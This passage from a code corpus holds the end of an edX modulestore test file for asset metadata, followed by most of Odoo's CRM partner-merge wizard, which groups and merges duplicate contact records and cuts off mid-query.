self.assertEquals(store.delete_asset_metadata(asset_key, ModuleStoreEnum.UserID.test), 1)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'different')), 0)
@ddt.data(*MODULESTORE_SETUPS)
def test_find_different(self, storebuilder):
"""
finding things which are of type other than 'asset'
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
asset_key = course.id.make_asset_key('different', 'burn.jpg')
new_asset_thumbnail = self._make_asset_thumbnail_metadata(
self._make_asset_metadata(asset_key)
)
store.save_asset_metadata(new_asset_thumbnail, ModuleStoreEnum.UserID.test)
self.assertIsNotNone(store.find_asset_metadata(asset_key))
unknown_asset_key = course.id.make_asset_key('different', 'nosuchfile.jpg')
self.assertIsNone(store.find_asset_metadata(unknown_asset_key))
def _check_asset_values(self, assets, orig):
"""
Check asset type/path values.
"""
for idx, asset in enumerate(orig):
self.assertEquals(assets[idx].asset_id.asset_type, asset[0])
self.assertEquals(assets[idx].asset_id.path, asset[1])
@ddt.data(*MODULESTORE_SETUPS)
def test_get_multiple_types(self, storebuilder):
"""
getting all things which are of type other than 'asset'
"""
# pylint: disable=bad-continuation
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
# Save 'em.
for asset_type, filename in self.alls:
asset_key = course.id.make_asset_key(asset_type, filename)
new_asset = self._make_asset_thumbnail_metadata(
self._make_asset_metadata(asset_key)
)
store.save_asset_metadata(new_asset, ModuleStoreEnum.UserID.test)
# Check 'em.
for asset_type, asset_list in (
('different', self.differents),
('vrml', self.vrmls),
('asset', self.regular_assets),
):
assets = store.get_all_asset_metadata(course.id, asset_type)
self.assertEquals(len(assets), len(asset_list))
self._check_asset_values(assets, asset_list)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'not_here')), 0)
self.assertEquals(len(store.get_all_asset_metadata(course.id, None)), 4)
assets = store.get_all_asset_metadata(
course.id, None, start=0, maxresults=-1,
sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
)
self.assertEquals(len(assets), len(self.alls))
self._check_asset_values(assets, self.alls)
@ddt.data(*MODULESTORE_SETUPS)
def test_save_metadata_list(self, storebuilder):
"""
Save a list of asset metadata all at once.
"""
# pylint: disable=bad-continuation
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
# Make a list of AssetMetadata objects.
md_list = []
for asset_type, filename in self.alls:
asset_key = course.id.make_asset_key(asset_type, filename)
md_list.append(self._make_asset_thumbnail_metadata(
self._make_asset_metadata(asset_key)
))
# Save 'em.
store.save_asset_metadata_list(md_list, ModuleStoreEnum.UserID.test)
# Check 'em.
for asset_type, asset_list in (
('different', self.differents),
('vrml', self.vrmls),
('asset', self.regular_assets),
):
assets = store.get_all_asset_metadata(course.id, asset_type)
self.assertEquals(len(assets), len(asset_list))
self._check_asset_values(assets, asset_list)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'not_here')), 0)
self.assertEquals(len(store.get_all_asset_metadata(course.id, None)), 4)
assets = store.get_all_asset_metadata(
course.id, None, start=0, maxresults=-1,
sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
)
self.assertEquals(len(assets), len(self.alls))
self._check_asset_values(assets, self.alls)
@ddt.data(*MODULESTORE_SETUPS)
def test_save_metadata_list_with_mismatched_asset(self, storebuilder):
"""
Save a list of asset metadata all at once - but with one asset's metadata from a different course.
"""
# pylint: disable=bad-continuation
with storebuilder.build() as (__, store):
course1 = CourseFactory.create(modulestore=store)
course2 = CourseFactory.create(modulestore=store)
# Make a list of AssetMetadata objects.
md_list = []
for asset_type, filename in self.alls:
if asset_type == 'asset':
asset_key = course2.id.make_asset_key(asset_type, filename)
else:
asset_key = course1.id.make_asset_key(asset_type, filename)
md_list.append(self._make_asset_thumbnail_metadata(
self._make_asset_metadata(asset_key)
))
# Save 'em.
store.save_asset_metadata_list(md_list, ModuleStoreEnum.UserID.test)
# Check 'em.
for asset_type, asset_list in (
('different', self.differents),
('vrml', self.vrmls),
):
assets = store.get_all_asset_metadata(course1.id, asset_type)
self.assertEquals(len(assets), len(asset_list))
self._check_asset_values(assets, asset_list)
self.assertEquals(len(store.get_all_asset_metadata(course1.id, 'asset')), 0)
self.assertEquals(len(store.get_all_asset_metadata(course1.id, None)), 3)
assets = store.get_all_asset_metadata(
course1.id, None, start=0, maxresults=-1,
sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
)
self.assertEquals(len(assets), len(self.differents + self.vrmls))
self._check_asset_values(assets, self.differents + self.vrmls)
@ddt.data(*MODULESTORE_SETUPS)
def test_delete_all_different_type(self, storebuilder):
"""
deleting all assets of a given but not 'asset' type
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
asset_key = course.id.make_asset_key('different', 'burn_thumb.jpg')
new_asset_thumbnail = self._make_asset_thumbnail_metadata(
self._make_asset_metadata(asset_key)
)
store.save_asset_metadata(new_asset_thumbnail, ModuleStoreEnum.UserID.test)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'different')), 1)
@ddt.data(*MODULESTORE_SETUPS)
def test_get_all_assets_with_paging(self, storebuilder):
"""
Save multiple metadata in each store and retrieve it singularly, as all assets, and after deleting all.
"""
with storebuilder.build() as (__, store):
course1 = CourseFactory.create(modulestore=store)
course2 = CourseFactory.create(modulestore=store)
self.setup_assets(course1.id, course2.id, store)
expected_sorts_by_2 = (
(
('displayname', ModuleStoreEnum.SortOrder.ascending),
('code.tgz', 'demo.swf', 'dog.png', 'roman_history.pdf', 'weather_patterns.bmp'),
(2, 2, 1)
),
(
('displayname', ModuleStoreEnum.SortOrder.descending),
('weather_patterns.bmp', 'roman_history.pdf', 'dog.png', 'demo.swf', 'code.tgz'),
(2, 2, 1)
),
(
('uploadDate', ModuleStoreEnum.SortOrder.ascending),
('code.tgz', 'dog.png', 'roman_history.pdf', 'weather_patterns.bmp', 'demo.swf'),
(2, 2, 1)
),
(
('uploadDate', ModuleStoreEnum.SortOrder.descending),
('demo.swf', 'weather_patterns.bmp', 'roman_history.pdf', 'dog.png', 'code.tgz'),
(2, 2, 1)
),
)
# First, with paging across all sorts.
for sort_test in expected_sorts_by_2:
for i in xrange(3):
asset_page = store.get_all_asset_metadata(
course2.id, 'asset', start=2 * i, maxresults=2, sort=sort_test[0]
)
num_expected_results = sort_test[2][i]
expected_filename = sort_test[1][2 * i]
self.assertEquals(len(asset_page), num_expected_results)
self.assertEquals(asset_page[0].asset_id.path, expected_filename)
if num_expected_results == 2:
expected_filename = sort_test[1][(2 * i) + 1]
self.assertEquals(asset_page[1].asset_id.path, expected_filename)
# Now fetch everything.
asset_page = store.get_all_asset_metadata(
course2.id, 'asset', start=0, sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
)
self.assertEquals(len(asset_page), 5)
self.assertEquals(asset_page[0].asset_id.path, 'code.tgz')
self.assertEquals(asset_page[1].asset_id.path, 'demo.swf')
self.assertEquals(asset_page[2].asset_id.path, 'dog.png')
self.assertEquals(asset_page[3].asset_id.path, 'roman_history.pdf')
self.assertEquals(asset_page[4].asset_id.path, 'weather_patterns.bmp')
# Some odd conditions.
asset_page = store.get_all_asset_metadata(
course2.id, 'asset', start=100, sort=('uploadDate', ModuleStoreEnum.SortOrder.ascending)
)
self.assertEquals(len(asset_page), 0)
asset_page = store.get_all_asset_metadata(
course2.id, 'asset', start=3, maxresults=0,
sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
)
self.assertEquals(len(asset_page), 0)
asset_page = store.get_all_asset_metadata(
course2.id, 'asset', start=3, maxresults=-12345,
sort=('displayname', ModuleStoreEnum.SortOrder.descending)
)
self.assertEquals(len(asset_page), 2)
@ddt.data(XmlModulestoreBuilder(), MixedModulestoreBuilder([('xml', XmlModulestoreBuilder())]))
def test_xml_not_yet_implemented(self, storebuilder):
"""
Test coverage which shows that for now xml read operations are not implemented
"""
with storebuilder.build(contentstore=None) as (__, store):
course_key = store.make_course_key("org", "course", "run")
asset_key = course_key.make_asset_key('asset', 'foo.jpg')
self.assertEquals(store.find_asset_metadata(asset_key), None)
self.assertEquals(store.get_all_asset_metadata(course_key, 'asset'), [])
@ddt.data(*MODULESTORE_SETUPS)
def test_copy_all_assets_same_modulestore(self, storebuilder):
"""
Create a course with assets, copy them all to another course in the same modulestore, and check on it.
"""
with storebuilder.build() as (__, store):
course1 = CourseFactory.create(modulestore=store)
course2 = CourseFactory.create(modulestore=store)
self.setup_assets(course1.id, None, store)
self.assertEquals(len(store.get_all_asset_metadata(course1.id, 'asset')), 2)
self.assertEquals(len(store.get_all_asset_metadata(course2.id, 'asset')), 0)
store.copy_all_asset_metadata(course1.id, course2.id, ModuleStoreEnum.UserID.test * 101)
self.assertEquals(len(store.get_all_asset_metadata(course1.id, 'asset')), 2)
all_assets = store.get_all_asset_metadata(
course2.id, 'asset', sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
)
self.assertEquals(len(all_assets), 2)
self.assertEquals(all_assets[0].asset_id.path, 'pic1.jpg')
self.assertEquals(all_assets[1].asset_id.path, 'shout.ogg')
@ddt.data(*MODULESTORE_SETUPS)
def test_copy_all_assets_from_course_with_no_assets(self, storebuilder):
"""
Create a course with *no* assets, and try copy them all to another course in the same modulestore.
"""
with storebuilder.build() as (__, store):
course1 = CourseFactory.create(modulestore=store)
course2 = CourseFactory.create(modulestore=store)
store.copy_all_asset_metadata(course1.id, course2.id, ModuleStoreEnum.UserID.test * 101)
self.assertEquals(len(store.get_all_asset_metadata(course1.id, 'asset')), 0)
self.assertEquals(len(store.get_all_asset_metadata(course2.id, 'asset')), 0)
all_assets = store.get_all_asset_metadata(
course2.id, 'asset', sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
)
self.assertEquals(len(all_assets), 0)
@ddt.data(
('mongo', 'split'),
('split', 'mongo'),
)
@ddt.unpack
def test_copy_all_assets_cross_modulestore(self, from_store, to_store):
"""
Create a course with assets, copy them all to another course in a different modulestore, and check on it.
"""
mixed_builder = MIXED_MODULESTORE_BOTH_SETUP
with mixed_builder.build() as (__, mixed_store):
with mixed_store.default_store(from_store):
course1 = CourseFactory.create(modulestore=mixed_store)
with mixed_store.default_store(to_store):
course2 = CourseFactory.create(modulestore=mixed_store)
self.setup_assets(course1.id, None, mixed_store)
self.assertEquals(len(mixed_store.get_all_asset_metadata(course1.id, 'asset')), 2)
self.assertEquals(len(mixed_store.get_all_asset_metadata(course2.id, 'asset')), 0)
mixed_store.copy_all_asset_metadata(course1.id, course2.id, ModuleStoreEnum.UserID.test * 102)
all_assets = mixed_store.get_all_asset_metadata(
course2.id, 'asset', sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
)
self.assertEquals(len(all_assets), 2)
self.assertEquals(all_assets[0].asset_id.path, 'pic1.jpg')
self.assertEquals(all_assets[1].asset_id.path, 'shout.ogg')
| agpl-3.0 |
akhmadMizkat/odoo | addons/crm/base_partner_merge.py | 9 | 30876 | #!/usr/bin/env python
from __future__ import absolute_import
from email.utils import parseaddr
import functools
import htmlentitydefs
import itertools
import logging
import operator
import psycopg2
import re
from ast import literal_eval
from openerp.exceptions import ValidationError
from openerp.tools import mute_logger
# Validation Library https://pypi.python.org/pypi/validate_email/1.1
from .validate_email import validate_email
import openerp
from openerp.osv import osv, orm
from openerp.osv import fields
from openerp.osv.orm import browse_record
from openerp.tools.translate import _
from openerp.exceptions import UserError
pattern = re.compile("&(\w+?);")
_logger = logging.getLogger('base.partner.merge')
# http://www.php2python.com/wiki/function.html-entity-decode/
def html_entity_decode_char(m, defs=htmlentitydefs.entitydefs):
try:
return defs[m.group(1)]
except KeyError:
return m.group(0)
def html_entity_decode(string):
return pattern.sub(html_entity_decode_char, string)
def sanitize_email(email):
assert isinstance(email, basestring) and email
result = re.subn(r';|/|:', ',',
html_entity_decode(email or ''))[0].split(',')
emails = [parseaddr(email)[1]
for item in result
for email in item.split()]
return [email.lower()
for email in emails
if validate_email(email)]
def is_integer_list(ids):
return all(isinstance(i, (int, long)) for i in ids)
class ResPartner(osv.Model):
_inherit = 'res.partner'
_columns = {
'id': fields.integer('Id', readonly=True),
'create_date': fields.datetime('Create Date', readonly=True),
}
class MergePartnerLine(osv.TransientModel):
_name = 'base.partner.merge.line'
_columns = {
'wizard_id': fields.many2one('base.partner.merge.automatic.wizard',
'Wizard'),
'min_id': fields.integer('MinID'),
'aggr_ids': fields.char('Ids', required=True),
}
_order = 'min_id asc'
class MergePartnerAutomatic(osv.TransientModel):
"""
The idea behind this wizard is to create a list of potential partners to
merge. We use two objects, the first one is the wizard for the end-user.
And the second will contain the partner list to merge.
"""
_name = 'base.partner.merge.automatic.wizard'
_columns = {
# Group by
'group_by_email': fields.boolean('Email'),
'group_by_name': fields.boolean('Name'),
'group_by_is_company': fields.boolean('Is Company'),
'group_by_vat': fields.boolean('VAT'),
'group_by_parent_id': fields.boolean('Parent Company'),
'state': fields.selection([('option', 'Option'),
('selection', 'Selection'),
('finished', 'Finished')],
'State',
readonly=True,
required=True),
'number_group': fields.integer("Group of Contacts", readonly=True),
'current_line_id': fields.many2one('base.partner.merge.line', 'Current Line'),
'line_ids': fields.one2many('base.partner.merge.line', 'wizard_id', 'Lines'),
'partner_ids': fields.many2many('res.partner', string='Contacts'),
'dst_partner_id': fields.many2one('res.partner', string='Destination Contact'),
'exclude_contact': fields.boolean('A user associated to the contact'),
'exclude_journal_item': fields.boolean('Journal Items associated to the contact'),
'maximum_group': fields.integer("Maximum of Group of Contacts"),
}
def default_get(self, cr, uid, fields, context=None):
if context is None:
context = {}
res = super(MergePartnerAutomatic, self).default_get(cr, uid, fields, context)
if context.get('active_model') == 'res.partner' and context.get('active_ids'):
partner_ids = context['active_ids']
res['state'] = 'selection'
res['partner_ids'] = partner_ids
res['dst_partner_id'] = self._get_ordered_partner(cr, uid, partner_ids, context=context)[-1].id
return res
_defaults = {
'state': 'option'
}
def get_fk_on(self, cr, table):
q = """ SELECT cl1.relname as table,
att1.attname as column
FROM pg_constraint as con, pg_class as cl1, pg_class as cl2,
pg_attribute as att1, pg_attribute as att2
WHERE con.conrelid = cl1.oid
AND con.confrelid = cl2.oid
AND array_lower(con.conkey, 1) = 1
AND con.conkey[1] = att1.attnum
AND att1.attrelid = cl1.oid
AND cl2.relname = %s
AND att2.attname = 'id'
AND array_lower(con.confkey, 1) = 1
AND con.confkey[1] = att2.attnum
AND att2.attrelid = cl2.oid
AND con.contype = 'f'
"""
return cr.execute(q, (table,))
def _update_foreign_keys(self, cr, uid, src_partners, dst_partner, context=None):
_logger.debug('_update_foreign_keys for dst_partner: %s for src_partners: %r', dst_partner.id, list(map(operator.attrgetter('id'), src_partners)))
# find the many2one relation to a partner
proxy = self.pool.get('res.partner')
self.get_fk_on(cr, 'res_partner')
# ignore two tables
for table, column in cr.fetchall():
if 'base_partner_merge_' in table:
continue
partner_ids = tuple(map(int, src_partners))
query = "SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%s'" % (table)
cr.execute(query, ())
columns = []
for data in cr.fetchall():
if data[0] != column:
columns.append(data[0])
query_dic = {
'table': table,
'column': column,
'value': columns[0],
}
if len(columns) <= 1:
# unique key treated
query = """
UPDATE "%(table)s" as ___tu
SET %(column)s = %%s
WHERE
%(column)s = %%s AND
NOT EXISTS (
SELECT 1
FROM "%(table)s" as ___tw
WHERE
%(column)s = %%s AND
___tu.%(value)s = ___tw.%(value)s
)""" % query_dic
for partner_id in partner_ids:
cr.execute(query, (dst_partner.id, partner_id, dst_partner.id))
else:
try:
with mute_logger('openerp.sql_db'), cr.savepoint():
query = 'UPDATE "%(table)s" SET %(column)s = %%s WHERE %(column)s IN %%s' % query_dic
cr.execute(query, (dst_partner.id, partner_ids,))
if column == proxy._parent_name and table == 'res_partner':
query = """
WITH RECURSIVE cycle(id, parent_id) AS (
SELECT id, parent_id FROM res_partner
UNION
SELECT cycle.id, res_partner.parent_id
FROM res_partner, cycle
WHERE res_partner.id = cycle.parent_id AND
cycle.id != cycle.parent_id
)
SELECT id FROM cycle WHERE id = parent_id AND id = %s
"""
cr.execute(query, (dst_partner.id,))
except psycopg2.Error:
# updating fails, most likely due to a violated unique constraint
# keeping record with nonexistent partner_id is useless, better delete it
query = 'DELETE FROM %(table)s WHERE %(column)s = %%s' % query_dic
cr.execute(query, (partner_id,))
def _update_reference_fields(self, cr, uid, src_partners, dst_partner, context=None):
_logger.debug('_update_reference_fields for dst_partner: %s for src_partners: %r', dst_partner.id, list(map(operator.attrgetter('id'), src_partners)))
def update_records(model, src, field_model='model', field_id='res_id', context=None):
proxy = self.pool.get(model)
if proxy is None:
return
domain = [(field_model, '=', 'res.partner'), (field_id, '=', src.id)]
ids = proxy.search(cr, openerp.SUPERUSER_ID, domain, context=context)
try:
with mute_logger('openerp.sql_db'), cr.savepoint():
return proxy.write(cr, openerp.SUPERUSER_ID, ids, {field_id: dst_partner.id}, context=context)
except psycopg2.Error:
# updating fails, most likely due to a violated unique constraint
# keeping record with nonexistent partner_id is useless, better delete it
return proxy.unlink(cr, openerp.SUPERUSER_ID, ids, context=context)
update_records = functools.partial(update_records, context=context)
for partner in src_partners:
update_records('calendar', src=partner, field_model='model_id.model')
update_records('ir.attachment', src=partner, field_model='res_model')
update_records('mail.followers', src=partner, field_model='res_model')
update_records('mail.message', src=partner)
update_records('marketing.campaign.workitem', src=partner, field_model='object_id.model')
update_records('ir.model.data', src=partner)
proxy = self.pool['ir.model.fields']
domain = [('ttype', '=', 'reference')]
record_ids = proxy.search(cr, openerp.SUPERUSER_ID, domain, context=context)
for record in proxy.browse(cr, openerp.SUPERUSER_ID, record_ids, context=context):
try:
proxy_model = self.pool[record.model]
column = proxy_model._columns[record.name]
except KeyError:
# unknown model or field => skip
continue
if isinstance(column, fields.function):
continue
for partner in src_partners:
domain = [
(record.name, '=', 'res.partner,%d' % partner.id)
]
model_ids = proxy_model.search(cr, openerp.SUPERUSER_ID, domain, context=context)
values = {
record.name: 'res.partner,%d' % dst_partner.id,
}
proxy_model.write(cr, openerp.SUPERUSER_ID, model_ids, values, context=context)
def _update_values(self, cr, uid, src_partners, dst_partner, context=None):
_logger.debug('_update_values for dst_partner: %s for src_partners: %r', dst_partner.id, list(map(operator.attrgetter('id'), src_partners)))
columns = dst_partner._columns
def write_serializer(column, item):
if isinstance(item, browse_record):
return item.id
else:
return item
values = dict()
for column, field in columns.iteritems():
if field._type not in ('many2many', 'one2many') and not isinstance(field, fields.function):
for item in itertools.chain(src_partners, [dst_partner]):
if item[column]:
values[column] = write_serializer(column, item[column])
values.pop('id', None)
parent_id = values.pop('parent_id', None)
dst_partner.write(values)
if parent_id and parent_id != dst_partner.id:
try:
dst_partner.write({'parent_id': parent_id})
except ValidationError:
_logger.info('Skip recursive partner hierarchies for parent_id %s of partner: %s', parent_id, dst_partner.id)
@mute_logger('openerp.osv.expression', 'openerp.models')
def _merge(self, cr, uid, partner_ids, dst_partner=None, context=None):
proxy = self.pool.get('res.partner')
partner_ids = proxy.exists(cr, uid, list(partner_ids), context=context)
if len(partner_ids) < 2:
return
if len(partner_ids) > 3:
raise UserError(_("For safety reasons, you cannot merge more than 3 contacts together. You can re-open the wizard several times if needed."))
if openerp.SUPERUSER_ID != uid and len(set(partner.email for partner in proxy.browse(cr, uid, partner_ids, context=context))) > 1:
raise UserError(_("All contacts must have the same email. Only the Administrator can merge contacts with different emails."))
if dst_partner and dst_partner.id in partner_ids:
src_partners = proxy.browse(cr, uid, [id for id in partner_ids if id != dst_partner.id], context=context)
else:
ordered_partners = self._get_ordered_partner(cr, uid, partner_ids, context)
dst_partner = ordered_partners[-1]
src_partners = ordered_partners[:-1]
_logger.info("dst_partner: %s", dst_partner.id)
if openerp.SUPERUSER_ID != uid and self._model_is_installed(cr, uid, 'account.move.line', context=context) and \
self.pool.get('account.move.line').search(cr, openerp.SUPERUSER_ID, [('partner_id', 'in', [partner.id for partner in src_partners])], context=context):
raise UserError(_("Only the destination contact may be linked to existing Journal Items. Please ask the Administrator if you need to merge several contacts linked to existing Journal Items."))
call_it = lambda function: function(cr, uid, src_partners, dst_partner,
context=context)
call_it(self._update_foreign_keys)
call_it(self._update_reference_fields)
call_it(self._update_values)
_logger.info('(uid = %s) merged the partners %r with %s', uid, list(map(operator.attrgetter('id'), src_partners)), dst_partner.id)
dst_partner.message_post(body='%s %s'%(_("Merged with the following partners:"), ", ".join('%s<%s>(ID %s)' % (p.name, p.email or 'n/a', p.id) for p in src_partners)))
for partner in src_partners:
partner.unlink()
def clean_emails(self, cr, uid, context=None):
"""
Clean the email address of the partner, if there is an email field with
a mimum of two addresses, the system will create a new partner, with the
information of the previous one and will copy the new cleaned email into
the email field.
"""
context = dict(context or {})
proxy_model = self.pool['ir.model.fields']
field_ids = proxy_model.search(cr, uid, [('model', '=', 'res.partner'),
('ttype', 'like', '%2many')],
context=context)
fields = proxy_model.read(cr, uid, field_ids, context=context)
reset_fields = dict((field['name'], []) for field in fields)
proxy_partner = self.pool['res.partner']
context['active_test'] = False
ids = proxy_partner.search(cr, uid, [], context=context)
fields = ['name', 'var' 'partner_id' 'is_company', 'email']
partners = proxy_partner.read(cr, uid, ids, fields, context=context)
partners.sort(key=operator.itemgetter('id'))
partners_len = len(partners)
_logger.info('partner_len: %r', partners_len)
for idx, partner in enumerate(partners):
if not partner['email']:
continue
percent = (idx / float(partners_len)) * 100.0
_logger.info('idx: %r', idx)
_logger.info('percent: %r', percent)
try:
emails = sanitize_email(partner['email'])
head, tail = emails[:1], emails[1:]
email = head[0] if head else False
proxy_partner.write(cr, uid, [partner['id']],
{'email': email}, context=context)
for email in tail:
values = dict(reset_fields, email=email)
proxy_partner.copy(cr, uid, partner['id'], values,
context=context)
except Exception:
_logger.exception("There is a problem with this partner: %r", partner)
raise
return True
def close_cb(self, cr, uid, ids, context=None):
return {'type': 'ir.actions.act_window_close'}
def _generate_query(self, fields, maximum_group=100):
sql_fields = []
for field in fields:
if field in ['email', 'name']:
sql_fields.append('lower(%s)' % field)
elif field in ['vat']:
sql_fields.append("replace(%s, ' ', '')" % field)
else:
sql_fields.append(field)
group_fields = ', '.join(sql_fields)
filters = []
for field in fields:
if field in ['email', 'name', 'vat']:
filters.append((field, 'IS NOT', 'NULL'))
criteria = ' AND '.join('%s %s %s' % (field, operator, value)
for field, operator, value in filters)
text = [
"SELECT min(id), array_agg(id)",
"FROM res_partner",
]
if criteria:
text.append('WHERE %s' % criteria)
text.extend([
"GROUP BY %s" % group_fields,
"HAVING COUNT(*) >= 2",
"ORDER BY min(id)",
])
if maximum_group:
text.extend([
"LIMIT %s" % maximum_group,
])
return ' '.join(text)
def _compute_selected_groupby(self, this):
group_by_str = 'group_by_'
group_by_len = len(group_by_str)
fields = [
key[group_by_len:]
for key in self._columns.keys()
if key.startswith(group_by_str)
]
groups = [
field
for field in fields
if getattr(this, '%s%s' % (group_by_str, field), False)
]
if not groups:
raise UserError(_("You have to specify a filter for your selection"))
return groups
def next_cb(self, cr, uid, ids, context=None):
"""
Don't compute any thing
"""
context = dict(context or {}, active_test=False)
this = self.browse(cr, uid, ids[0], context=context)
if this.current_line_id:
this.current_line_id.unlink()
return self._next_screen(cr, uid, this, context)
def _get_ordered_partner(self, cr, uid, partner_ids, context=None):
partners = self.pool.get('res.partner').browse(cr, uid, list(partner_ids), context=context)
ordered_partners = sorted(sorted(partners,
key=operator.attrgetter('create_date'), reverse=True),
key=operator.attrgetter('active'), reverse=True)
return ordered_partners
def _next_screen(self, cr, uid, this, context=None):
this.refresh()
values = {}
if this.line_ids:
# in this case, we try to find the next record.
current_line = this.line_ids[0]
current_partner_ids = literal_eval(current_line.aggr_ids)
values.update({
'current_line_id': current_line.id,
'partner_ids': [(6, 0, current_partner_ids)],
'dst_partner_id': self._get_ordered_partner(cr, uid, current_partner_ids, context)[-1].id,
'state': 'selection',
})
else:
values.update({
'current_line_id': False,
'partner_ids': [],
'state': 'finished',
})
this.write(values)
return {
'type': 'ir.actions.act_window',
'res_model': this._name,
'res_id': this.id,
'view_mode': 'form',
'target': 'new',
}
def _model_is_installed(self, cr, uid, model, context=None):
proxy = self.pool.get('ir.model')
domain = [('model', '=', model)]
return proxy.search_count(cr, uid, domain, context=context) > 0
def _partner_use_in(self, cr, uid, aggr_ids, models, context=None):
"""
Check if there is no occurence of this group of partner in the selected
model
"""
for model, field in models.iteritems():
proxy = self.pool.get(model)
domain = [(field, 'in', aggr_ids)]
if proxy.search_count(cr, uid, domain, context=context):
return True
return False
def compute_models(self, cr, uid, ids, context=None):
"""
Compute the different models needed by the system if you want to exclude
some partners.
"""
assert is_integer_list(ids)
this = self.browse(cr, uid, ids[0], context=context)
models = {}
if this.exclude_contact:
models['res.users'] = 'partner_id'
if self._model_is_installed(cr, uid, 'account.move.line', context=context) and this.exclude_journal_item:
models['account.move.line'] = 'partner_id'
return models
def _process_query(self, cr, uid, ids, query, context=None):
"""
Execute the select request and write the result in this wizard
"""
proxy = self.pool.get('base.partner.merge.line')
this = self.browse(cr, uid, ids[0], context=context)
models = self.compute_models(cr, uid, ids, context=context)
cr.execute(query)
counter = 0
for min_id, aggr_ids in cr.fetchall():
if models and self._partner_use_in(cr, uid, aggr_ids, models, context=context):
continue
values = {
'wizard_id': this.id,
'min_id': min_id,
'aggr_ids': aggr_ids,
}
proxy.create(cr, uid, values, context=context)
counter += 1
values = {
'state': 'selection',
'number_group': counter,
}
this.write(values)
_logger.info("counter: %s", counter)
def start_process_cb(self, cr, uid, ids, context=None):
"""
Start the process.
* Compute the selected groups (with duplication)
* If the user has selected the 'exclude_XXX' fields, avoid the partners.
"""
assert is_integer_list(ids)
context = dict(context or {}, active_test=False)
this = self.browse(cr, uid, ids[0], context=context)
groups = self._compute_selected_groupby(this)
query = self._generate_query(groups, this.maximum_group)
self._process_query(cr, uid, ids, query, context=context)
return self._next_screen(cr, uid, this, context)
def automatic_process_cb(self, cr, uid, ids, context=None):
assert is_integer_list(ids)
this = self.browse(cr, uid, ids[0], context=context)
this.start_process_cb()
this.refresh()
for line in this.line_ids:
partner_ids = literal_eval(line.aggr_ids)
self._merge(cr, uid, partner_ids, context=context)
line.unlink()
cr.commit()
this.write({'state': 'finished'})
return {
'type': 'ir.actions.act_window',
'res_model': this._name,
'res_id': this.id,
'view_mode': 'form',
'target': 'new',
}
def parent_migration_process_cb(self, cr, uid, ids, context=None):
assert is_integer_list(ids)
context = dict(context or {}, active_test=False)
this = self.browse(cr, uid, ids[0], context=context)
query = """
SELECT
min(p1.id),
array_agg(DISTINCT p1.id)
FROM
res_partner as p1
INNER join
res_partner as p2
ON
p1.email = p2.email AND
p1.name = p2.name AND
(p1.parent_id = p2.id OR p1.id = p2.parent_id)
WHERE
p2.id IS NOT NULL
GROUP BY
p1.email,
p1.name,
CASE WHEN p1.parent_id = p2.id THEN p2.id
ELSE p1.id
END
HAVING COUNT(*) >= 2
ORDER BY
min(p1.id)
"""
self._process_query(cr, uid, ids, query, context=context)
for line in this.line_ids:
partner_ids = literal_eval(line.aggr_ids)
self._merge(cr, uid, partner_ids, context=context)
line.unlink()
cr.commit()
this.write({'state': 'finished'})
cr.execute("""
UPDATE
res_partner
SET
is_company = NULL,
parent_id = NULL
WHERE
parent_id = id
""")
return {
'type': 'ir.actions.act_window',
'res_model': this._name,
'res_id': this.id,
'view_mode': 'form',
'target': 'new',
}
def update_all_process_cb(self, cr, uid, ids, context=None):
assert is_integer_list(ids)
# WITH RECURSIVE cycle(id, parent_id) AS (
# SELECT id, parent_id FROM res_partner
# UNION
# SELECT cycle.id, res_partner.parent_id
# FROM res_partner, cycle
# WHERE res_partner.id = cycle.parent_id AND
# cycle.id != cycle.parent_id
# )
# UPDATE res_partner
# SET parent_id = NULL
# WHERE id in (SELECT id FROM cycle WHERE id = parent_id);
this = self.browse(cr, uid, ids[0], context=context)
self.parent_migration_process_cb(cr, uid, ids, context=None)
list_merge = [
{'group_by_vat': True, 'group_by_email': True, 'group_by_name': True},
# {'group_by_name': True, 'group_by_is_company': True, 'group_by_parent_id': True},
# {'group_by_email': True, 'group_by_is_company': True, 'group_by_parent_id': True},
# {'group_by_name': True, 'group_by_vat': True, 'group_by_is_company': True, 'exclude_journal_item': True},
# {'group_by_email': True, 'group_by_vat': True, 'group_by_is_company': True, 'exclude_journal_item': True},
# {'group_by_email': True, 'group_by_is_company': True, 'exclude_contact': True, 'exclude_journal_item': True},
# {'group_by_name': True, 'group_by_is_company': True, 'exclude_contact': True, 'exclude_journal_item': True}
]
for merge_value in list_merge:
id = self.create(cr, uid, merge_value, context=context)
self.automatic_process_cb(cr, uid, [id], context=context)
cr.execute("""
UPDATE
res_partner
SET
is_company = NULL
WHERE
parent_id IS NOT NULL AND
is_company IS NOT NULL
""")
# cr.execute("""
# UPDATE
# res_partner as p1
# SET
# is_company = NULL,
# parent_id = (
# SELECT p2.id
# FROM res_partner as p2
# WHERE p2.email = p1.email AND
# p2.parent_id != p2.id
# LIMIT 1
# )
# WHERE
# p1.parent_id = p1.id
# """)
return self._next_screen(cr, uid, this, context)
def merge_cb(self, cr, uid, ids, context=None):
assert is_integer_list(ids)
context = dict(context or {}, active_test=False)
this = self.browse(cr, uid, ids[0], context=context)
partner_ids = set(map(int, this.partner_ids))
if not partner_ids:
this.write({'state': 'finished'})
return {
'type': 'ir.actions.act_window',
'res_model': this._name,
'res_id': this.id,
'view_mode': 'form',
'target': 'new',
}
self._merge(cr, uid, partner_ids, this.dst_partner_id, context=context)
if this.current_line_id:
this.current_line_id.unlink()
return self._next_screen(cr, uid, this, context)
def auto_set_parent_id(self, cr, uid, ids, context=None):
assert is_integer_list(ids)
# select partner who have one least invoice
partner_treated = ['@gmail.com']
cr.execute(""" SELECT p.id, p.email
FROM res_partner as p
LEFT JOIN account_invoice as a
